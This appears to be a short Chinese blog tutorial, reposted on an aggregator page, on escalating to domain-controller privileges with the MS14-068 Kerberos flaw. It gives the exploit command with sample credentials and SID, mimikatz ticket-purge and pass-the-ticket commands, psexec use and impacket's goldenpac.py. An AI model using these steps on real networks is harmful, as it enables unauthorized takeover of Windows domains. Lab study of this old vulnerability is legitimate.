zoukankan
html css js c++ java
MS14-068提权和impacket工具包提权
ms14-068提权
工具利用
a)拿下边界机win7,并已经有win7上任意一个账号的密码
-u 用户名@域
-p 用户密码
-s 用户sid
-d 域控
ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com
生成一个ccache后缀票据
导入票据
导入之前,清空票据缓存
kerberos::purge
kerberos::ptc 票据
使用psexec工具连接win08(域控机器)尝试执行命令,看到的权限是test3的,但是实际上所属已经是win08上,并且是最高权限
impacket工具包提权
b) 没拿到边界机,但是有账号密码的情况
使用/impacket/examples下的goldenpac.py脚本
注意@domain-host 指的是域控机的位置
成功进入win08的命令行模式
查看全文
相关阅读:
简单排序
vue router在history模式下 如何部署在tomcat上
概率论复习纲要
MyBatis学习笔记(持续更新 2021/01/06- 2021/01/10)
JavaWeb学习笔记(持续编辑2021/1/5-)
2021/01/10周学习总结
将WiFi搞得可以认证石铁大校园网(小米3路由器)
对老师的建议
自我感觉加分项
github、gitee冲突配置ssh key
原文地址:https://www.cnblogs.com/sup3rman/p/12329854.html
最新文章
第六章 HTTP协议
剑指 Offer 32
剑指 Offer 32
剑指 Offer 28. 对称的二叉树
剑指 Offer 27. 二叉树的镜像
剑指 Offer 26. 树的子结构
剑指 Offer 07. 重建二叉树
keycloak和阿里api网关集成
ExecutorService中submit和execute的区别
MyBatis批量插入返回主键
热门文章
恶意二——生涯回忆
STL笔试
红黑树之删除节点
红黑树
二叉查找树
六大组件
C++ 素未某面
二叉树存储和遍历
树形结构
渐进最优排序
Copyright © 2011-2022 走看看